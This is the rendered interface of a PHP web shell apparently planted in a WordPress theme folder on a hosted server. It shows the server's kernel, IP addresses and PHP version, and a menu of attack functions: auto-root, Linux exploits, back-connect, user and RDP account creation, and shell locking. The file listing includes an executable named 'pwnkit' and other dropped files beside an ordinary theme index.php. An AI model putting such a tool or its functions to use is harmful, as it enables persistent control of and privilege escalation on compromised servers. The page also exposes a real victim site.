Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.103.20.6 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
formahte
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
formahte /
www /
wp-content /
themes /
blue-taste /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
README.txt
331
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
archive.php
1.98
KB
-rw-r--r--
comments.php
1.49
KB
-rw-r--r--
content-index.php
174.94
KB
-rw-r--r--
dd_ie.js
568
B
-rw-r--r--
footer.php
563
B
-rw-r--r--
functions.php
1.46
KB
-rw-r--r--
functionsbak.php
995
B
-rw-r--r--
header.php
1.89
KB
-rw-r--r--
index.php
2.18
KB
-rw-r--r--
license.txt
15.05
KB
-rw-r--r--
logo.jpg
174.94
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
screenshot.png
47.83
KB
-rw-r--r--
search.php
1.62
KB
-rw-r--r--
searchform.php
377
B
-rw-r--r--
sidebar.php
812
B
-rw-r--r--
style.css
13.6
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<?php /* * Blue Taste Wordpress Theme By Jabox (http://www.jabox.com.ar) */ ?> <?php get_header(); ?> <div id="content"> <?php wp_nav_menu(array('theme_location' => 'custom_nav_menu','menu' => 'custom_nav_menu','container_class' => 'cutom-nav-menu','fallback_cb'=>false)); ?> <?php if (have_posts()) : while (have_posts()) : the_post(); ?> <div class="post-container"> <div id="post-<?php the_ID(); ?>" <?php post_class(); ?>> <div class="post-title"> <?php if (!is_page()) { ?><div class="post-date"><span class="post-month"><?php the_time('M') ?></span> <span class="post-day"><?php the_time('d') ?></span></div> <?php } ?> <h2><a href="<?php the_permalink() ?>" rel="bookmark" title="Permanent Link to <?php the_title_attribute(); ?>"><?php the_title(); ?></a></h2> <?php if (!is_page()) { ?><span class="post-auth">By <?php the_author(); ?></span><span class="post-comments"><?php comments_popup_link('No Comments', '1 Comment', '% Comments'); ?></span><?php } ?> </div> <div class="entry"> <?php if ((!is_single()) && (!is_page()) ) the_post_thumbnail(array(100,100)); ?> <?php the_content('Continue reading this entry »'); ?> <?php wp_link_pages(); ?> </div> <?php if (is_page()) { global $id; $children = wp_list_pages("title_li=&child_of=$id&show_date=modified&echo=0"); if ($children) { ?> <h3>More under this page: </h3> <ul> <?php wp_list_pages("title_li=&child_of=$id&show_date=modified");?> </ul> <?php }} ?> <?php if (!is_page()) { ?><div class="post-cat"><?php the_category(', ') ?></div><?php } ?> <?php if (!is_page()) { ?><div class="post-tag"><?php the_tags('') ?></div><?php } ?> <div style="clear: both"></div> </div> </div> <?php comments_template(); ?> <div class="separator"></div> <?php endwhile; ?> <div class="navigation-down"><span class="previous-entries"><?php next_posts_link('< Older') ?></span><span class="next-entries"><?php previous_posts_link('Newer >') ?></span> </div> <?php else : ?> <h2>Not Found</h2> <p>Sorry, we couldn't find what you were looking for.</p> <?php endif; ?> </div> <?php get_sidebar(); ?> <?php get_footer(); ?>
Close